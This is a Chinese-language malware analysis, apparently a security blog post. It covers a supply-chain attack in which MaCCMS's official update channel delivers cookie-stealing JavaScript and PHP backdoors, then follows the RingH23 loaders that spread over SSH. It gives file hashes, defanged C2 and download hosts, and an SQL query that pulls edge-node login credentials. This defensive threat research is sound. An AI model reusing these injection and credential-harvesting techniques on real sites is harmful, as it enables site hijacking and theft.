<p>&#x7136;&#x800C;&#xFF0C;&#x6B63;&#x662F;&#x8FD9;&#x6837;&#x4E00;&#x4E2A;&#x88AB;&#x5E7F;&#x6CDB;&#x4F7F;&#x7528;&#x7684;&#x9879;&#x76EE;&#xFF0C;&#x5374;&#x5DF2;&#x5377;&#x5165;&#x4E00;&#x573A;<strong>&#x4F9B;&#x5E94;&#x94FE;&#x5B89;&#x5168;&#x4E8B;&#x4EF6;</strong>&#x3002;&#x6211;&#x4EEC;&#x5DF2;&#x638C;&#x63E1;&#x660E;&#x786E;&#x8BC1;&#x636E;&#x8868;&#x660E;&#xFF0C;maccms.la &#x7684;&#x5B98;&#x65B9;&#x5347;&#x7EA7;&#x901A;&#x9053;&#x88AB;&#x7528;&#x4E8E;&#x4E0B;&#x53D1;&#x6076;&#x610F; PHP &#x540E;&#x95E8;&#x4EE3;&#x7801;&#xFF0C;&#x8BE5;&#x540E;&#x95E8;&#x5728;&#x670D;&#x52A1;&#x5668;&#x4FA7;&#x6267;&#x884C;&#x540E;&#xFF0C;&#x4F1A;&#x8FDB;&#x4E00;&#x6B65;&#x690D;&#x5165;&#x6076;&#x610F; JavaScript &#x811A;&#x672C;&#xFF0C;&#x5BF9;&#x524D;&#x7AEF;&#x9875;&#x9762;&#x5B9E;&#x65BD;&#x52AB;&#x6301;&#x4E0E;&#x6D41;&#x91CF;&#x64CD;&#x63A7;&#x3002;&#x6076;&#x610F;&#x811A;&#x672C;&#x7684;&#x6280;&#x672F;&#x7279;&#x5F81;&#x4E0E; FUNNULL&#x56E2;&#x4F19;&#x5728;&#x591A;&#x8D77;&#x5386;&#x53F2;&#x653B;&#x51FB;&#x6D3B;&#x52A8;&#x4E2D;&#x4F7F;&#x7528;&#x7684;&#x624B;&#x6CD5;&#x9AD8;&#x5EA6;&#x4E00;&#x81F4;&#xFF0C;&#x5370;&#x8BC1;&#x4E86;&#x4E1A;&#x5185;&#x8FD1;&#x671F;&#x6D41;&#x4F20;&#x7684;&#x5224;&#x65AD;&#xFF1A;<strong>maccms.la &#x5DF2;&#x5B9E;&#x9645;&#x88AB; FUNNULL &#x56E2;&#x4F19;&#x63A7;&#x5236;&#xFF0C;&#x6216;&#x5DF2;&#x88AB;&#x5176;&#x6536;&#x8D2D;&#x5E76;&#x4F5C;&#x4E3A;&#x653B;&#x51FB;&#x57FA;&#x7840;&#x8BBE;&#x65BD;&#x7684;&#x4E00;&#x90E8;&#x5206;&#x6301;&#x7EED;&#x8FD0;&#x8425;</strong>&#x3002;</p>
<h2 id="0x1-%E5%8D%87%E7%BA%A7%E9%80%9A%E9%81%93%E6%8A%95%E6%AF%92">0x1: &#x5347;&#x7EA7;&#x901A;&#x9053;&#x6295;&#x6BD2;</h2>
<p>maccms github &#x6E90;&#x7801;<code>application\admin\view_new\index\index.html</code>&#x4E2D;&#x6709;&#x4E00;&#x6BB5;ajax&#x4EE3;&#x7801;&#x5C06;maccms&#xFF0C;php&#xFF0C;thinkphp&#x7684;&#x7248;&#x672C;&#x4FE1;&#x606F;&#x4E0A;&#x62A5;&#x7ED9;&#x8FDC;&#x7A0B;&#x670D;&#x52A1;&#x5668;(update.maccms.la)&#xFF0C;&#x68C0;&#x67E5;&#x662F;&#x5426;&#x9700;&#x8981;&#x5347;&#x7EA7;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_ajax.png" alt="ring_ajax.png" loading="lazy"></p>
<p>&#x4E00;&#x5207;&#x770B;&#x4F3C;&#x6B63;&#x5E38;&#xFF0C;&#x4F46;&#x662F;&#x5728;&#x5B9E;&#x9645;&#x4E2D;&#x6211;&#x4EEC;&#x53D1;&#x73B0;MACCMS&#x5B8C;&#x6210;&#x5B89;&#x88C5;&#x540E;&#x7B2C;&#x4E00;&#x6B21;&#x767B;&#x5F55;&#x7BA1;&#x7406;&#x540E;&#x53F0;&#x65F6;&#xFF0C;&#x8FDC;&#x7A0B;&#x670D;&#x52A1;&#x5668;&#x4F1A;&#x53D1;&#x4E0B;&#x53D1;&#x6076;&#x610F;JS&#x4EE3;&#x7801;&#xFF0C;&#x7528;&#x4E8E;&#x7A83;&#x53D6;&#x654F;&#x611F;&#x6570;&#x636E;&#xFF0C;&#x4E0B;&#x8F7D;PHP&#x6076;&#x610F;&#x8F7D;&#x8377;&#x3002;</p>
<ul>
<li>post&#xFF1A;&#x5411;&#x8FDC;&#x7A0B;&#x670D;&#x52A1;&#x5668;&#x4E0A;&#x62A5;Cookie&#xFF0C;&#x7BA1;&#x7406;&#x540E;&#x53F0;&#x5730;&#x5740;&#x7B49;&#x654F;&#x611F;&#x4FE1;&#x606F;</li>
<li>iframe&#xFF1A;&#x901A;&#x8FC7;&#x7684;&#x9690;&#x853D;iframe&#x89E6;&#x53D1;MACCMS&#x7684;&#x4E0B;&#x8F7D;&#x673A;&#x5236;&#xFF0C;&#x62C9;&#x53D6;&#x6076;&#x610F;&#x8F7D;&#x8377;</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_loginrps.png" alt="ring_loginrps.png" loading="lazy"></p>
<p>&#x5F53;&#x7F51;&#x9875;&#x4E2D;&#x7684;iframe&#x52A0;&#x8F7D;&#x5176;<code>src</code>&#x5C5E;&#x6027;&#x6307;&#x5411;&#x7684;&#x5730;&#x5740;<code>ADMIN_PATH/admin/update/step1.html?file=laupdc00ecc82ab4b6d060da64d886e97b2c4</code>&#x65F6;&#xFF0C;&#x6D4F;&#x89C8;&#x5668;&#x4F1A;&#x5411;&#x8BE5;URL&#x53D1;&#x8D77;&#x8BF7;&#x6C42;&#x3002;&#x8BE5;&#x8BF7;&#x6C42;&#x7ECF;&#x7531;&#x540E;&#x7AEF;&#x8DEF;&#x7531;&#x89E3;&#x6790;&#xFF0C;&#x6700;&#x7EC8;&#x4F1A;&#x8C03;&#x7528;&#x4F4D;&#x4E8E;<code>application/admin/controller/Update.php</code>&#x4E2D;&#x7684;<code>step1()</code>&#x51FD;&#x6570;&#x3002;&#x8BE5;&#x51FD;&#x6570;&#x7684;&#x6838;&#x5FC3;&#x529F;&#x80FD;&#x662F;&#xFF1A;&#x63A5;&#x6536;<code>file</code>&#x53C2;&#x6570;&#xFF0C;&#x4E3A;&#x5176;&#x8FFD;&#x52A0;<code>.zip</code>&#x6269;&#x5C55;&#x540D;&#x5E76;&#x7ED3;&#x5408;&#x65F6;&#x95F4;&#x6233;&#x751F;&#x6210;&#x4E00;&#x4E2A;&#x5B8C;&#x6574;&#x7684;&#x8D44;&#x6E90;&#x6807;&#x8BC6;&#xFF0C;&#x968F;&#x540E;&#x7A0B;&#x5E8F;&#x4F1A;&#x57FA;&#x4E8E;&#x8FD9;&#x4E2A;&#x6807;&#x8BC6;&#x5411;&#x6307;&#x5B9A;&#x7684;&#x8FDC;&#x7A0B;&#x670D;&#x52A1;&#x5668;&#x53D1;&#x8D77;&#x8BF7;&#x6C42;&#xFF0C;&#x5C1D;&#x8BD5;&#x83B7;&#x53D6;&#x5BF9;&#x5E94;&#x7684;&#x8D44;&#x6E90;&#x6587;&#x4EF6;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_step1.png" alt="ring_step1.png" loading="lazy"></p>
<p>&#x4ECE;&#x5B9E;&#x9645;&#x6D41;&#x91CF;&#x5206;&#x6790;&#x53EF;&#x89C1;&#xFF0C;<code>laupdc00ecc82ab4b6d060da64d886e97b2c4.zip</code>&#x8FD9;&#x4E00;&#x8D44;&#x6E90;&#x540D;&#x53EF;&#x62C6;&#x5206;&#x4E3A;&quot;laupd&quot;&#x524D;&#x7F00;&#x548C;&#x4E00;&#x6BB5;32&#x4F4D;MD5&#x5B57;&#x7B26;&#x4E32;&#xFF0C;&#x6784;&#x6210;&#x5178;&#x578B;&#x7684;&#x4F2A;&#x88C5;&#x547D;&#x540D;&#x3002;&#x670D;&#x52A1;&#x5668;&#x54CD;&#x5E94;&#x5934;&#x4E2D;<code>Date</code>&#x4E0E;<code>Last-Modified</code>&#x65F6;&#x95F4;&#x6233;&#x5B8C;&#x5168;&#x4E00;&#x81F4;&#xFF0C;&#x4E14;&#x8BBE;&#x7F6E;&#x4E86;&#x4EC5;3&#x5206;&#x949F;&#x7684;&#x6709;&#x6548;&#x671F;&#xFF08;<code>max-age=180</code>&#xFF09;&#xFF0C;&#x8868;&#x660E;&#x8BE5;&#x6587;&#x4EF6;&#x5E76;&#x975E;&#x9884;&#x5148;&#x5B58;&#x50A8;&#xFF0C;&#x800C;&#x662F;&#x9488;&#x5BF9;&#x8BF7;&#x6C42;&#x5373;&#x65F6;&#x52A8;&#x6001;&#x751F;&#x6210;&#x7684;&#x6076;&#x610F;payload&#x3002;&#x8FD9;&#x79CD;&#x77ED;&#x65F6;&#x6548;&#x8BBE;&#x8BA1;&#x4F7F;&#x6587;&#x4EF6;&#x5728;&#x4E0B;&#x8F7D;&#x7A97;&#x53E3;&#x8FC7;&#x540E;&#x5373;&#x65E0;&#x6CD5;&#x8BBF;&#x95EE;&#xFF08;&#x8FD4;&#x56DE;&quot;access denied&quot;&#xFF09;&#xFF0C;&#x6709;&#x6548;&#x89C4;&#x907F;&#x4E86;&#x4E8B;&#x540E;&#x53D6;&#x8BC1;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_cmsupd.png" alt="ring_cmsupd.png" loading="lazy"></p>
<h2 id="0x2-php%E6%81%B6%E6%84%8F%E8%BD%BD%E8%8D%B7">0x2: PHP&#x6076;&#x610F;&#x8F7D;&#x8377;</h2>
<p>laupdc00ecc82ab4b6d060da64d886e97b2c4.zip&#x5728;&#x89E3;&#x538B;&#x540E;&#x4F1A;&#x91CA;&#x653E; <code>application/extra/active.php</code> &#x6587;&#x4EF6;&#x3002;&#x6B64;&#x5916;&#xFF0C;&#x6211;&#x4EEC;&#x5728;&#x91CE;&#x8FD8;&#x53D1;&#x73B0;&#x4E86;&#x53E6;&#x4E00;&#x4E2A;&#x6076;&#x610F; PHP &#x8F7D;&#x8377; <code>addons.php</code>&#x3002;</p>
<table>
<thead>
<tr>
<th>MD5</th>
<th>PATH</th>
</tr>
</thead>
<tbody>
<tr>
<td>b06b9f13505eb49d6b3f4bddd64b12ce</td>
<td>application/extra/active.php</td>
</tr>
<tr>
<td>eb03db7ac9f10af66a1e2b16185fcadc</td>
<td>application/extra/addons.php</td>
</tr>
</tbody>
</table>
<p>&#x8FD9;&#x4E24;&#x4E2A;PHP&#x6076;&#x610F;&#x8F7D;&#x8377;&#x90FD;&#x6CA1;&#x6709;&#x4F7F;&#x7528;&#x4EE3;&#x7801;&#x6DF7;&#x6DC6;&#x6280;&#x672F;&#xFF0C;&#x5206;&#x6790;&#x96BE;&#x5EA6;&#x8F83;&#x4F4E;&#x3002;&#x5B83;&#x4EEC;&#x7684;&#x6838;&#x5FC3;&#x529F;&#x80FD;&#x90FD;&#x662F;&#x5411;&#x7F51;&#x7AD9;&#x690D;&#x5165;&#x6076;&#x610F;JavaScript&#x4EE3;&#x7801;&#xFF0C;&#x4F46;&#x91C7;&#x7528;&#x4E86;&#x4E0D;&#x540C;&#x7684;&#x653B;&#x51FB;&#x7B56;&#x7565;&#x5B9E;&#x73B0;&#x7F51;&#x9875;&#x7BE1;&#x6539;&#xFF0C;&#x4E3B;&#x8981;&#x533A;&#x522B;&#x5728;&#x4E8E;&#x6CE8;&#x5165;&#x65B9;&#x5F0F;&#x548C;&#x76EE;&#x6807;&#x5BF9;&#x8C61;&#xFF1A;</p>
<ul>
<li>addons.php&#x91C7;&#x7528;&#x52A8;&#x6001;&#x6CE8;&#x5165;&#x65B9;&#x5F0F;&#xFF0C;&#x5728;&#x9875;&#x9762;&#x6E32;&#x67D3;&#x8FC7;&#x7A0B;&#x4E2D;&#x5C06;&#x6076;&#x610F;JS&#x4EE3;&#x7801;&#x63D2;&#x5165;&#x5230;HTML&#x6587;&#x4EF6;&#x7684;&lt;/html&gt;&#x6807;&#x7B7E;&#x4E4B;&#x524D;&#x3002;</li>
<li>active.php &#x5219;&#x91C7;&#x7528;&#x52A8;&#x9759;&#x7ED3;&#x5408;&#x7684;&#x53CC;&#x91CD;&#x6CE8;&#x5165;&#x7B56;&#x7565;&#xFF1A;&#x4E00;&#x65B9;&#x9762;&#x52A8;&#x6001;&#x5730;&#x5C06;&#x6076;&#x610F;&#x4EE3;&#x7801;&#x63D2;&#x5165;&#x5230;HTML&#x6587;&#x4EF6;&#x7684;&lt;/head&gt;&#x6807;&#x7B7E;&#x4E4B;&#x524D;&#xFF1B;&#x53E6;&#x4E00;&#x65B9;&#x9762;&#x8FD8;&#x4F1A;&#x9759;&#x6001;&#x5730;&#x4FEE;&#x6539;&#x7CFB;&#x7EDF;JS&#x6A21;&#x677F;&#x6587;&#x4EF6;&#xFF0C;&#x76F4;&#x63A5;&#x5411;&#x6587;&#x4EF6;&#x5C3E;&#x90E8;&#x5199;&#x5165;&#x6076;&#x610F;&#x4EE3;&#x7801;&#x3002;</li>
</ul>
<p>&#x4EE5;active.php&#x4E3A;&#x4F8B;&#xFF0C;&#x8BE5;&#x6076;&#x610F;&#x8F7D;&#x8377;&#x5728;ThinkPHP&#x6846;&#x67B6;&#x4E2D;&#x6CE8;&#x518C;&#x4E86;&#x4E00;&#x4E2A;view_filter&#x94A9;&#x5B50;&#xFF0C;&#x4F7F;&#x5F97;&#x6240;&#x6709;&#x9700;&#x8981;&#x6E32;&#x67D3;&#x7684;&#x9875;&#x9762;&#x5728;&#x52A0;&#x8F7D;&#x65F6;&#x90FD;&#x4F1A;&#x81EA;&#x52A8;&#x89E6;&#x53D1;&#x5176;&#x611F;&#x67D3;&#x6D41;&#x7A0B;&#xFF0C;&#x5B9E;&#x73B0;&#x4E86;&#x5BF9;&#x7F51;&#x7AD9;&#x8BBF;&#x95EE;&#x6D41;&#x91CF;&#x7684;&#x5168;&#x9762;&#x76D1;&#x63A7;&#x548C;&#x5B9E;&#x65F6;&#x653B;&#x51FB;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_hook.png" alt="ring_hook.png" loading="lazy"></p>
<p>&#x4E3A;&#x4E86;&#x964D;&#x4F4E;&#x7684;&#x66B4;&#x9732;&#x7684;&#x98CE;&#x9669;&#xFF0C;&#x5B83;&#x8FD8;&#x5B9E;&#x73B0;&#x4E86;&#x4E00;&#x4E2A;&#x7CBE;&#x5BC6;&#x7684;&#x8BBF;&#x95EE;&#x6761;&#x4EF6;&#x7B5B;&#x9009;&#x673A;&#x5236;&#xFF1A;&#x53EA;&#x6709;&#x5F53;&#x7528;&#x6237;&#x4F7F;&#x7528;&#x624B;&#x673A;&#x8BBE;&#x5907;&#x3001;&#x901A;&#x8FC7;&#x5916;&#x90E8;&#x94FE;&#x63A5;&#x8BBF;&#x95EE;&#x7F51;&#x7AD9;&#x524D;&#x53F0;&#x9875;&#x9762;&#x3001;&#x4E14;&#x4E3A;&#x975E;Ajax&#x8BF7;&#x6C42;&#x65F6;&#x624D;&#x4F1A;&#x89E6;&#x53D1;&#x6076;&#x610F;&#x4EE3;&#x7801;&#xFF0C;&#x540C;&#x65F6;&#x901A;&#x8FC7;&#x4F1A;&#x8BDD;&#x63A7;&#x5236;&#x786E;&#x4FDD;&#x6BCF;&#x4E2A;&#x7528;&#x6237;&#x6700;&#x591A;&#x6BCF;10&#x5C0F;&#x65F6;&#x53EA;&#x88AB;&#x653B;&#x51FB;&#x4E00;&#x6B21;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_condition.png" alt="ring_condition.png" loading="lazy"></p>
<p>&#x5F53;&#x6761;&#x4EF6;&#x6EE1;&#x8DB3;&#x65F6;&#xFF0C;&#x8FDB;&#x884C;&#x5BF9;HTML&#x548C;JS&#x7BE1;&#x6539;&#x7684;&#x6D41;&#x7A0B;&#x3002;<strong>&#x5148;&#x770B;&#x5BF9;HTML&#x7684;&#x4FEE;&#x6539;</strong>&#xFF0C;&#x5B83;&#x7684;&#x903B;&#x8F91;&#x6838;&#x5FC3;&#x5176;&#x5B9E;&#x5C31;&#x662F;&#x7528;str_replace&#x51FD;&#x6570;&#x5C06;&#x7F51;&#x9875;&#x4E2D;&#x7684;$template_marker&#x66FF;&#x6362;&#x4E3A;$template_token.$template_marker&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_html.png" alt="ring_html.png" loading="lazy"></p>
<p>$template_token&#x548C;$template_marker &#x5B83;&#x4EEC;&#x4F7F;&#x7528;8&#x8FDB;&#x5236;&#x7F16;&#x7801;&#xFF0C;gzip&#x538B;&#x7F29;&#xFF0C;&#x6CA1;&#x6709;PHP&#x73AF;&#x5883;&#x7684;&#x8BFB;&#x8005;&#x53EF;&#x4EE5;&#x4F7F;&#x7528;&#x5728;&#x7EBF;&#x7684;PHP Sandbox&#x67E5;&#x770B;&#x5B83;&#x4EEC;&#x7684;&#x5185;&#x5BB9;&#x3002;template_token&#x662F;&#x6076;&#x610F;JS&#x4EE3;&#x7801;&#xFF0C;&#x76F8;&#x4FE1;&#x8BFB;&#x8005;&#x4E00;&#x5B9A;&#x4F1A;&#x89C9;&#x5F97;&#x773C;&#x719F;&#xFF0C;&#x5B83;&#x6B63;&#x662F;&#x524D;&#x9762;&#x7AE0;&#x8282;&#x5DF2;&#x5206;&#x6790;&#x8FC7;&#x7684;JS Loader&#x4EE3;&#x7801;&#xFF0C;&#x800C;template_marker&#x6B63;&#x662F;&lt;/head&gt;&#x6807;&#x7B7E;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_htmlflag.png" alt="ring_htmlflag.png" loading="lazy"></p>
<p><strong>&#x518D;&#x6765;&#x770B;&#x5BF9;JS&#x7684;&#x4FEE;&#x6539;</strong>&#xFF0C;&#x5B83;&#x7684;&#x6838;&#x5FC3;&#x903B;&#x8F91;&#x662F;&#x4F7F;&#x7528;file_put_contents&#x51FD;&#x6570;&#x5BF9;&#x539F;&#x59CB;JS&#x6587;&#x4EF6;&#x8FDB;&#x884C;&#x8986;&#x5199;&#xFF0C;&#x6076;&#x610F;JS&#x4EE3;&#x7801;&#x4EE5;&#x53CA;/*system_optimization_signature*/&#x683C;&#x5F0F;&#x7684;&#x6807;&#x7B7E;&#x5C06;&#x88AB;&#x6DFB;&#x52A0;&#x5230;JS&#x6587;&#x4EF6;&#x5C3E;&#x90E8;&#xFF0C;system_optimization_signature&#x662F;JS&#x6587;&#x4EF6;&#x662F;&#x5426;&#x88AB;&#x611F;&#x67D3;&#x7684;&#x6807;&#x8BC6;&#xFF0C;&#x5B83;&#x662F;&#x6076;&#x610F;JS&#x4EE3;&#x7801;&#x7684;MD5&#x503C;&#x7684;&#x524D;12&#x5B57;&#x8282;&#xFF0C;&#x5373;138ae887806f&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_jsflag.png" alt="ring_jsflag.png" loading="lazy"></p>
<p>&#x5728;Google&#x641C;&#x7D22;138ae887806f&#xFF0C;&#x53EF;&#x4EE5;&#x770B;&#x5230;&#x4E0D;&#x5C11;&#x7528;&#x6237;&#x8BA8;&#x8BBA;&#x8FD9;&#x4E00;&#x611F;&#x67D3;&#x60C5;&#x51B5;&#x3002;&#x7528;&#x6237;&#x7684;&#x6E05;&#x7406;&#x5DE5;&#x4F5C;&#x5F80;&#x5F80;&#x505C;&#x7559;&#x5728;&#x6E05;&#x9664;&#x5DF2;&#x88AB;&#x611F;&#x67D3;&#x7684;JavaScript&#x6587;&#x4EF6;&#x8FD9;&#x4E00;&#x8868;&#x9762;&#x75C7;&#x72B6;&#x3002;&#x800C;&#x66F4;&#x6DF1;&#x5C42;&#x7684;PHP&#x6076;&#x610F;&#x8F7D;&#x8377;&#x4EE5;&#x53CA;&#xFF0C;&#x4F5C;&#x4E3A;&#x6301;&#x7EED;&#x653B;&#x51FB;&#x6E90;&#x7684;maccms.la&#x5B98;&#x65B9;&#x6295;&#x6BD2;&#x901A;&#x9053;&#xFF0C;&#x5E76;&#x672A;&#x88AB;&#x53D1;&#x73B0;&#x548C;&#x6839;&#x9664;&#xFF0C;&#x8FD9;&#x5BFC;&#x81F4;&#x4E86;&#x7F51;&#x7AD9;&#x4E0D;&#x65AD;&#x88AB;&#x91CD;&#x65B0;&#x690D;&#x5165;&#x6076;&#x610F;&#x4EE3;&#x7801;&#xFF0C;&#x9677;&#x5165;&#x201C;&#x6E05;&#x7406;-&#x518D;&#x611F;&#x67D3;&#x201D;&#x7684;&#x5FAA;&#x73AF;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_googlejs.png" alt="ring_googlejs.png" loading="lazy"></p>
<h1 id="%E6%94%BB%E5%87%BB%E5%A5%97%E4%BB%B6ringh23%E6%8A%95%E6%AF%92%E6%8A%80%E6%9C%AF%E7%BB%86%E8%8A%82">&#x653B;&#x51FB;&#x5957;&#x4EF6;RingH23&#x6295;&#x6BD2;&#x6280;&#x672F;&#x7EC6;&#x8282;</h1>
<h2 id="0x1-infectinit">0x1: infect_init</h2>
<p>infection_init&#x7EC4;&#x4EF6;&#x7684;&#x57FA;&#x672C;&#x4FE1;&#x606F;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF0C;&#x5B83;&#x662F;&#x4E00;&#x4E2A;Golang&#x8BED;&#x8A00;&#x5B9E;&#x73B0;&#x7684;&#x611F;&#x67D3;&#x5668;&#xFF0C;&#x4F7F;&#x7528;&#x6807;&#x51C6;UPX&#x52A0;&#x58F3;&#x3002;</p>
<pre><code>MD5:65ac2839ab2790b6df8e80022982a2c0
Magic:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped section header size
Packer: UPX
</code></pre>
<p>infect_init&#x5FC5;&#x987B;&#x5728;root&#x6743;&#x9650;&#x4E0B;&#x8FD0;&#x884C;&#xFF0C;&#x81F3;&#x5C11;&#x9700;&#x8981;&#x63D0;&#x4F9B;session_token&#xFF0C;service_url&#xFF0C;group&#x4E09;&#x4E2A;&#x53C2;&#x6570;&#xFF0C;&#x5176;&#x4E2D;service_url&#x9ED8;&#x8BA4;&#x503C;&#x4E3A;service.client.110[.]nz&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/ring_infectusage.png" alt="ring_infectusage.png" loading="lazy"></p>
<p>&#x9996;&#x5148;&#xFF0C;&#x5B83;&#x4F1A;&#x548C;server_url&#x6307;&#x5B9A;&#x7684;&#x670D;&#x52A1;&#x5668;&#x4F9D;&#x6B21;&#x5E94;&#x9A8C;token&#xFF0C;group&#x662F;&#x5426;&#x6709;&#x6548;&#x3002;&#x4FE9;&#x8005;&#x90FD;&#x4F7F;&#x7528;GET&#x65B9;&#x6CD5;&#xFF0C;User-Agent&#x4E3A;&#x786C;&#x7F16;&#x7801;&#x7684;Azure&#x3002;</p>
<ul>
<li>token&#x6821;&#x9A8C;&#x8BF7;&#x6C42;&#xFF0C;&#x4F7F;&#x7528;&#x7684;uri&#x4E3A;/api/session/verify&#xFF0C;&#x53C2;&#x6570;&#x6307;&#x5B9A;&#x7684;token&#x4FDD;&#x5B58;&#x5728;&quot;X-Session&quot;&#x5B57;&#x6BB5;&#x4E2D;&#x3002;</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/ring_session.png" alt="ring_session.png" loading="lazy"></p>
<ul>
<li>group&#x6821;&#x9A8C;&#x8BF7;&#x6C42;&#xFF0C;&#x4F7F;&#x7528;&#x7684;uri&#x4E3A;/api/client_group/&quot;group&quot;&#xFF0C;&#x5982;&#x4E0B;&#x56FE;&#x6D41;&#x91CF;&#x4E2D;&#x7684;group&#x4E3A; <strong>j6</strong>&#x3002;</li>
</ul>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/ring_group.png" alt="ring_group.png" loading="lazy"></p>
<p>token,group&#x901A;&#x8FC7;&#x9A8C;&#x8BC1;&#x540E;&#xFF0C;&#x904D;&#x5386;/proc&#x76EE;&#x5F55;&#xFF0C;&#x67E5;&#x627E;edge-admin&#x8FDB;&#x7A0B;&#x3002;&#x518D;&#x901A;&#x8FC7;&#x8BE5;&#x8FDB;&#x7A0B;&#x914D;&#x7F6E;&#x6587;&#x4EF6;api_db.yaml&#x4E2D;&#x83B7;&#x53D6;&#x6570;&#x636E;&#x5E93;&#x7684;&#x8D26;&#x53F7;&#x548C;&#x5BC6;&#x7801;&#xFF0C;&#x5E76;&#x4F7F;&#x7528;&#x4EE5;&#x4E0B;sql&#x8BED;&#x53E5;&#xFF0C;&#x67E5;&#x8BE2;&#x6570;&#x636E;&#x5E93;&#x4E2D;&#x8FB9;&#x7F18;&#x8282;&#x70B9;&#x53CA;&#x5176;&#x767B;&#x5F55;&#x51ED;&#x8BC1;&#x3002;</p>
<pre><code>SELECT n.id, n.name, n.clusterId, l.type, l.params
FROM edgeNodes AS n LEFT JOIN edgeNodeLogins AS l
ON n.id=l.nodeId WHERE n.state=1
</code></pre>
<p>&#x5F53;&#x6210;&#x529F;&#x83B7;&#x5F97;&#x8282;&#x70B9;&#x7684;&#x767B;&#x5F55;&#x51ED;&#x540E;&#xFF0C;&#x6267;&#x884C;Main_SSHExec&#x51FD;&#x6570;&#xFF0C;&#x901A;&#x8FC7;SSH&#x534F;&#x8BAE;&#x767B;&#x5F55;&#x5230;&#x8FB9;&#x7F18;&#x8282;&#x70B9;&#xFF0C;&#x4E0B;&#x8F7D;&#x4E0B;&#x4E00;&#x9636;&#x6BB5;Payload&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/ring_sshexec.png" alt="ring_sshexec.png" loading="lazy"></p>
<p>Main_SSHExec&#x7684;&#x6838;&#x5FC3;&#x903B;&#x8F91;&#x5C31;&#x662F;&#x6267;&#x884C;&#x4EE5;&#x4E0B;&#x811A;&#x672C;&#xFF0C;&#x5728;&#x8FB9;&#x7F18;&#x8282;&#x70B9;&#x4E0A;&#x90E8;&#x7F72;&#x4E0B;&#x4E00;&#x9636;&#x6BB5; download_init&#x7EC4;&#x4EF6;&#xFF0C;&#x5176;&#x4E2D;DOWNLOAD_URL&#x4E3A; <code>download.zhw[.]sh/EMrsVQj9VQ/init</code>&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/ring_script.png" alt="ring_script.png" loading="lazy"></p>
<h2 id="0x2-downloadinit">0x2: download_init</h2>
<p>download_init&#x7EC4;&#x4EF6;&#x7684;&#x57FA;&#x672C;&#x4FE1;&#x606F;&#x5982;&#x4E0B;&#x6240;&#x793A;&#xFF0C;&#x5B83;&#x662F;&#x4E00;&#x4E2A;Golang&#x8BED;&#x8A00;&#x5B9E;&#x73B0;&#x7684;&#x4E0B;&#x8F7D;&#x5668;&#xFF0C;&#x4F7F;&#x7528;&#x6807;&#x51C6;UPX&#x52A0;&#x58F3;&#x3002;</p>
<pre><code>MD5:5d6c33bf931699805206b00594de5e71
MAGIC:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
PACKER:UPX
</code></pre>
<p>download_init&#x7684;&#x4E3B;&#x8981;&#x76EE;&#x7684;&#x662F;&#x4E0B;&#x8F7D;&#x4E0B;&#x4E00;&#x9636;&#x6BB5;&#x7684;&#x6076;&#x610F;&#x8F7D;&#x8377;&#xFF1A;&#x540E;&#x95E8;&#x6728;&#x9A6C;&#xFF0C;Rootkit&#xFF0C;Udev&#x6301;&#x4E45;&#x5316;&#x89C4;&#x5219;&#xFF0C;&#x4EE5;&#x53CA;Nginx&#x6A21;&#x5757;&#x7B49;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/ring_download.png" alt="ring_download.png" loading="lazy"></p>
<p>&#x548C;infect_init&#x4E00;&#x6837;&#xFF0C;download_init&#x4E5F;&#x5FC5;&#x987B;&#x5728;root&#x6743;&#x9650;&#x4E0B;&#x8FD0;&#x884C;&#xFF0C;&#x9664;service_token, service_url, group3&#x4E2A;&#x53C2;&#x6570;&#x4E4B;&#x5916;&#xFF0C;&#x8FD8;&#x5FC5;&#x987B;&#x6307;&#x5B9A; run mode&#xFF0C;&#x4F8B;&#x5982;&#x7528; &#x201C;install&#x201D; &#x8868;&#x793A;&#x5B89;&#x88C5;&#xFF0C;uninstall&#x8868;&#x793A;&#x5378;&#x8F7D;&#x7B49;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2025/12/ring_dlusage.png" alt="ring_dlusage.png" loading="lazy"></p>
<p>&#x548C;infect_init&#x4E0D;&#x540C;&#x7684;&#x662F;&#xFF0C;download_init&#x5728;group&#x53C2;&#x6570;&#x901A;&#x8FC7;&#x9A8C;&#x8BC1;&#x540E;&#xFF0C;&#x4F1A;&#x4ECE;C2&#x8FD4;&#x56DE;&#x7684;JSON&#x6570;&#x636E;&#x4E2D;&#x63D0;&#x53D6;hash&#x5B57;&#x6BB5;&#xFF0C;&#x4F9B;&#x540E;&#x7EED;&#x4F9B;register&#x8BF7;&#x6C42;&#x4F7F;&#x7528;&#x3002;</p>
<p><img src="https://blog.xlab.qianxin.com/content/images/2026/01/ring_hash.png" alt="ring_hash.png" loading="lazy"></p>
